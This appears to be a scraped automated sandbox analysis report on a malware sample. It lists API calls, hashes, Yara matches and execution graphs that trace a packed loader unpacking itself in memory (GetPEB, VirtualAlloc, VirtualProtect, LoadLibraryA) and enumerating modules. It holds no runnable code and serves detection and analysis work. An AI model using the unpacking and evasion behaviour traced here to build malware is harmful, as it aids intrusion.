                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: ACP$OCP
                                                                                                                                                                                                                                                                                      • API String ID: 0-711371036
                                                                                                                                                                                                                                                                                      • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                                                                      • Instruction ID: 14488b359d73a2b35151aaad325e7c1d9f20b01c06d3923b8e2598dc1437a59e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3212BA2AC4101A6DB30CB54C907B977366EF5CB11F569526E98AC7300F73ADD11C39E
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F25
                                                                                                                                                                                                                                                                                      • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F4A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: EncodersGdipImage$Size
                                                                                                                                                                                                                                                                                      • String ID: image/png
                                                                                                                                                                                                                                                                                      • API String ID: 864223233-2966254431
                                                                                                                                                                                                                                                                                      • Opcode ID: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
                                                                                                                                                                                                                                                                                      • Instruction ID: a861e299a60b9ced5094bb1731eec5177a5b987cbaa8a1425c649574426e8627
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04119476D00109FFCB01AFA99C8149EBB76FE41321B60027BE810B21E0C7755F419A58
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(0000000D,?,0040DE41,0040C659,?,?,00000000,?,0040C529,0045D5E4,0040C4F6,0045D5DC,?,ios_base::failbit set,0040C659), ref: 0040EFAA
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                                                                                                                                      • String ID: F(@
                                                                                                                                                                                                                                                                                      • API String ID: 1452528299-2698495834
                                                                                                                                                                                                                                                                                      • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                                                                                                                                                                                                                      • Instruction ID: 02fe8a739a07683bc60ca74788e4bb9a0325118a5e4d2b20450d6bc28493fa7e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B11C236300216BFCF165F66DD4496AB765BB08B11B11483AFA05A6290CA7498219BD9
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 0040C554
Strings
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: ___std_exception_destroy
• String ID: F(@$ios_base::failbit set
• API String ID: 4194217158-1828034088
• Opcode ID: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
• Instruction ID: 4ba2cac2fce41df0eb0aef52a6a00c17a8a4a8275336f9ee0f9be7dda5d805c6
• Opcode Fuzzy Hash: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
• Instruction Fuzzy Hash: 27F0B472A0022836D2302B56BC02B97F7CC8F50B69F14443FFE05A6681EBF8A94581EC
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: H_prolog3_catch
• String ID: MOC$RCC
• API String ID: 3886170330-2084237596
• Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
• Instruction ID: e9e4e095770ca636dcca3efe7f5224ff47edcbfbbe98bab9d98b6a8866433d4c
• Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
• Instruction Fuzzy Hash: 81F0AF70600224CFDB22AF95D40159D3B60AF82748F8281A7F9009B262C73C6E14CFAE
APIs
• std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E3C
  • Part of subcall function 0040BF5D: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF71
  • Part of subcall function 0040BF5D: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFAE
• std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E50
  • Part of subcall function 0040C008: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C02F
  • Part of subcall function 0040C008: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C0A0
Strings
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
• String ID: F@
• API String ID: 2118720939-885931407
• Opcode ID: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
• Instruction ID: 13870e84e441ff14f0459789a428ac9660f365acd1e629d5c6e8dadf1a096d8e
• Opcode Fuzzy Hash: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
• Instruction Fuzzy Hash: 7CF034B2410205DAEB21AF50C412B9973B4BF80B15F61813FE545AB2C1DB786949CB89
APIs
• std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00428D83
• __CxxThrowException@8.LIBVCRUNTIME ref: 00428DAA
  • Part of subcall function 0042860D: RaiseException.KERNEL32(?,?,0040D87E,00000000,00000000,00000000,00000000,?,?,?,?,0040D87E,00000000,0045617C,00000000), ref: 0042866D
Strings
• Access violation - no RTTI data!, xrefs: 00428D7A
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
• String ID: Access violation - no RTTI data!
• API String ID: 2053020834-2158758863
• Opcode ID: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
• Instruction ID: 6523df8e39b2e501409064d37ec9e65ca05e1b8799177bf407a1bfc54a05c872
• Opcode Fuzzy Hash: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
• Instruction Fuzzy Hash: 28E0DF726993185A9A04D6A1B846CDE73EC9E24300BA0001FF900920C2EE2DF918826D
APIs
• Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042382E
Strings
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: ContextInternal$BaseBase::~Concurrency::details::
• String ID: zB$~B
• API String ID: 3275300208-395995950
• Opcode ID: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
• Instruction ID: f55228a66ce0378ecda15d2e29e2cf9b619ecd1f8f2314d3bfe00ef4b4db5243
• Opcode Fuzzy Hash: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
• Instruction Fuzzy Hash: 83D05B7124C32525E2256A4974057857AD84B01764F50803FF94456682CBB9654442DC
APIs
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212DB
• __CxxThrowException@8.LIBVCRUNTIME ref: 004212E9
Strings
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: Exception@8Throwstd::invalid_argument::invalid_argument
• String ID: pThreadProxy
• API String ID: 1687795959-3651400591
• Opcode ID: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
• Instruction ID: be918fe35ab2875efcd6209978594ad56e839e7639c00e6f4a717d1a784130ad
• Opcode Fuzzy Hash: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
• Instruction Fuzzy Hash: DED05B71E0020856D700E7B6D806F9F77A85B10708F50427B7D14E6186DB79E50886AC
APIs
• MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,024C2AAD,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,024C2AAD,00000000), ref: 024EB187
• GetLastError.KERNEL32 ref: 024EB195
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,024C2AAD,00000000), ref: 024EB1F0
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 1717984340-0
• Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                                                                                                                                                                                                                                                      • Instruction ID: 889a65bff22dee2e63644321748b22c7b6246e322cde52ba5ac680d0d7812a25
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3941EB31A04216AFEF219F65CC4877FB7A5FF4176AF14416AEC5A5B2A0D7308901CB51
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,F(@,00000000), ref: 0042AF20
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0042AF2E
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF89
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1717984340-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                                                                                                                                                                                                                                      • Instruction ID: 9270b5025f3a17d6db836abfdfc26bc83889a51b194ae21b206bd0a56260f073
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F410770700222AFCB219F65EA44BABBBB4EF01311F56416BFC5597291DB3C8D11C75A

Execution Graph

Execution Coverage: 1.7%
Dynamic/Decrypted Code Coverage: 43.1%
Signature Coverage: 16.9%
Total number of Nodes: 65
Total number of Limit Nodes: 4
execution_graph 26316 8d85a8 26317 8d85b1 26316->26317 26320 8d8b06 26317->26320 26321 8d8b15 26320->26321 26324 8d92a6 26321->26324 26326 8d92c1 26324->26326 26325 8d92ca CreateToolhelp32Snapshot 26325->26326 26327 8d92e6 Module32First 26325->26327 26326->26325 26326->26327 26328 8d92f5 26327->26328 26330 8d8b05 26327->26330 26331 8d8f65 26328->26331 26332 8d8f90 26331->26332 26333 8d8fd9 26332->26333 26334 8d8fa1 VirtualAlloc 26332->26334 26333->26333 26334->26333 26340 43b068 26341 43b080 26340->26341 26343 43b16e 26341->26343 26346 43a9b0 LdrInitializeThunk 26341->26346 26344 43b23f 26343->26344 26347 43a9b0 LdrInitializeThunk 26343->26347 26346->26343 26347->26344 26348 40b44c 26352 40b45a 26348->26352 26353 40b57c 26348->26353 26349 40b65c 26355 43a950 RtlFreeHeap 26349->26355 26352->26349 26352->26353 26354 43a950 RtlFreeHeap 26352->26354 26354->26349 26355->26353 26356 43aecc 26357 43af00 26356->26357 26357->26357 26358 43af7e 26357->26358 26360 43a9b0 LdrInitializeThunk 26357->26360 26360->26358 26361 408790 26363 40879f 26361->26363 26362 408970 ExitProcess 26363->26362 26364 4087b4 GetCurrentProcessId GetCurrentThreadId 26363->26364 26367 40887a 26363->26367 26365 4087da 26364->26365 26366 4087de SHGetSpecialFolderPathW GetForegroundWindow 26364->26366 26365->26366 26366->26367 26367->26362 26368 438e51 RtlAllocateHeap 26369 43ab91 26370 43ab9a GetForegroundWindow 26369->26370 26371 43abad 26370->26371 26372 438e70 26373 438e83 26372->26373 26374 438e94 26372->26374 26375 438e88 RtlFreeHeap 26373->26375 26375->26374 26376 43b195 26378 43b197 26376->26378 26377 43b23f 26378->26377 26380 43a9b0 LdrInitializeThunk 26378->26380 26380->26377 26381 24a003c 26382 24a0049 26381->26382 26396 24a0e0f SetErrorMode SetErrorMode 26382->26396 26387 24a0265 26388 24a02ce VirtualProtect 26387->26388 26389 24a030b 26388->26389 26390 24a0439 VirtualFree 26389->26390 26394 24a05f4 LoadLibraryA 26390->26394 26395 24a04be 26390->26395 26391 24a04e3 LoadLibraryA 26391->26395 26393 24a08c7 26394->26393 26395->26391 26395->26394 26397 24a0223 26396->26397 26398 24a0d90 26397->26398 26399 24a0dad 26398->26399 26400 24a0dbb GetPEB 26399->26400 26401 24a0238 VirtualAlloc 26399->26401 26400->26401 26401->26387

Control-flow Graph

APIs
• GetCurrentProcessId.KERNEL32 ref: 004087B4
• GetCurrentThreadId.KERNEL32 ref: 004087BE
• SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040885B
• GetForegroundWindow.USER32 ref: 00408870
• ExitProcess.KERNEL32 ref: 00408972
Memory Dump Source
• Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_86DC.jbxd
Yara matches
Similarity
• API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
• String ID:
• API String ID: 4063528623-0
• Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
• Instruction ID: a67ee57a83d6170df5f07577f929ddf8a699819013d33d30bc43b1fbcecb0360
• Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
• Instruction Fuzzy Hash: 95417E77F443180BD31CBEB59C9A36AB2969BC4314F0A903F6985AB3D1DD7C5C0552C5

Control-flow Graph

control_flow_graph 242 43a9b0-43a9e2 LdrInitializeThunk
APIs
• LdrInitializeThunk.NTDLL(0043C978,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A9DE
Memory Dump Source
• Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_86DC.jbxd
Yara matches
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
• Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
• Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
• Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
Strings
Memory Dump Source
• Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_86DC.jbxd
Yara matches
Similarity
• API ID: InitializeThunk
• String ID: ihgf
• API String ID: 2994545307-2948842496
• Opcode ID: dc78d9af145ba0afec033d80e05627e4c530122498a0d20b58ff3d4b62c44d01
• Instruction ID: fada9a9e4b2345b6e6448840249a942183f34978708c931c01a97142677ee2ca
• Opcode Fuzzy Hash: dc78d9af145ba0afec033d80e05627e4c530122498a0d20b58ff3d4b62c44d01
• Instruction Fuzzy Hash: 4C31F434304300AFE7109B249CC2B7BBBA5EB8EB14F24653DF584A3391D265EC60874A
Memory Dump Source
• Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_86DC.jbxd
Yara matches
Similarity
• API ID:
• String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 4b87544a561184a7d4b1543d2ac67acc99fdb29ef1ee15d58e3a116105f186d8
                                                                                                                                                                                                                                                                                      • Instruction ID: 59f44d745d542156a41113c6a864a29fdb0868418a705d17f35015423a5ff240
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4b87544a561184a7d4b1543d2ac67acc99fdb29ef1ee15d58e3a116105f186d8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F418C76A587588FC724AF54ACC477BB3A1EB8A320F2E552DDAE517351E7648C0083CD

Control-flow Graph (rendering omitted; the node listing for blocks 24a003c-24a091d references VirtualAlloc, VirtualProtect, VirtualFree and LoadLibraryA)
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 024A024D
Strings
Memory Dump Source
• Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID: cess$kernel32.dll
• API String ID: 4275171209-1230238691
• Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction ID: 47db5edc071913791deb89cbc8230648d4aa3d877f6c379e8469fc357dd10e18
• Instruction Fuzzy Hash: 3C526974A01229DFDB64CF58C994BADBBB1BF09304F1480DAE94DAB351DB30AA95CF14

Control-flow Graph (rendering omitted; the node listing for blocks 43ab0b-43abce references GetForegroundWindow and a call to 43c7d0)
APIs
• GetForegroundWindow.USER32 ref: 0043AB9F
Strings
Memory Dump Source
• Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_86DC.jbxd
Yara matches
Similarity
• API ID: ForegroundWindow
• String ID: ilmn
• API String ID: 2020703349-1560153188
• Opcode ID: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
• Instruction ID: 381210f78ea322f673374cf03a2ab6eba84d6d5afac1efb59df7821204f613f6
• Instruction Fuzzy Hash: A0115C3BE5A65087D304DB65D806156B293EAC5214F0DD53DC986D770AEF3DDC028286

Control-flow Graph (rendering omitted; the node listing for blocks 8d92a6-8d9304 references CreateToolhelp32Snapshot, Module32First and a call to 8d8f65)
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008D92CE
• Module32First.KERNEL32(00000000,00000224), ref: 008D92EE
Memory Dump Source
• Source File: 00000003.00000002.1760070387.00000000008D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 008D8000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_8d8000_86DC.jbxd
Yara matches
Similarity
• API ID: CreateFirstModule32SnapshotToolhelp32
• String ID:
• API String ID: 3833638111-0
• Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction ID: 8187c6d0c34c316115fafa50bbaef845031d9c1a793c0e06134d700ebcb97721
• Instruction Fuzzy Hash: 3BF06231100715BFD7203BB9988DA6F77E8FF49725F10072AE696D15C0DA70E8454661

Control-flow Graph (rendering omitted; the node listing for blocks 24a0e0f-24a0e2c references two SetErrorMode calls)
APIs
• SetErrorMode.KERNELBASE(00000400,?,?,024A0223,?,?), ref: 024A0E19
• SetErrorMode.KERNELBASE(00000000,?,?,024A0223,?,?), ref: 024A0E1E
Memory Dump Source
• Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
Yara matches
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
• Instruction ID: 8cb0d109644ce714bdc84d03a3357bbc544987171c927014f260ece32c00e347
• Instruction Fuzzy Hash: 26D0123114512877DB002A94DC09BCE7B1CDF09B66F008011FB0DDD180C770954046E5

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 238 43ab91-43aba8 GetForegroundWindow call 43c7d0 241 43abad-43abce 238->241
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 0043AB9F
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ForegroundWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2020703349-0
                                                                                                                                                                                                                                                                                      • Opcode ID: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
                                                                                                                                                                                                                                                                                      • Instruction ID: 60e8b0f46bfb036eff5fe615915129b1fb2bd173e47bf556a6606a5c449cc706
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34E08C7EA406008BDB04DF20EC4A5517766B79A305B084039D903C37A6DB3DD816CA49

Control-flow Graph

control_flow_graph 243 438e70-438e7c 244 438e83-438e8e call 43bf00 RtlFreeHeap 243->244 245 438e94-438e95 243->245 244->245
APIs
• RtlFreeHeap.NTDLL(?,00000000,?,004127C7), ref: 00438E8E
Memory Dump Source
• Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_86DC.jbxd
Yara matches
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
• Instruction ID: 85901e1c641484a1e9593b863e702362ecf9fc70d5eef9c3d2e46bbe4163b786
• Opcode Fuzzy Hash: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
• Instruction Fuzzy Hash: 63D01235405526EBC6101F24FC06B863A54EF49321F030461B540AF076C734DC908AD8

Control-flow Graph

control_flow_graph 248 438e47-438e4a 249 438e51-438e55 RtlAllocateHeap 248->249
APIs
• RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55
Memory Dump Source
• Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_86DC.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
• Instruction ID: 4c59684187f8c9fc8ebab3782fe1e1f4842940d007367fb0e8ab7bd4dbd8a192
• Opcode Fuzzy Hash: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
• Instruction Fuzzy Hash: A0C0927C142211FBD2211B21AC5EF6B3E38FB83B63F104124F209580B287649011DA6E

Control-flow Graph

control_flow_graph 250 438e51-438e55 RtlAllocateHeap
APIs
• RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55
Memory Dump Source
• Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_86DC.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
• Instruction ID: 3dd49d49275fbb255d04589a33f94784ad2ffd24471d3276aa8c957077778349
• Opcode Fuzzy Hash: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
• Instruction Fuzzy Hash: 8AA0223C002200EBC2200B20AC0EF2B3E38FB83B23F000030F00C080B283308000CA2E

APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 008D8FB6
Memory Dump Source
• Source File: 00000003.00000002.1760070387.00000000008D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 008D8000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_8d8000_86DC.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction ID: b560369f75652eb40fc2e7a0bf2e28e7077ade26e31954562357536b3031c279
• Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction Fuzzy Hash: E7112B79A00208EFDB01DF98C985E98BBF5EF08351F058095F9489B362D771EA50DB80

APIs
• CoCreateInstance.OLE32(0043F68C,00000000,00000001,0043F67C), ref: 0043640E
• SysAllocString.OLEAUT32(FA46F8B5), ref: 0043646A
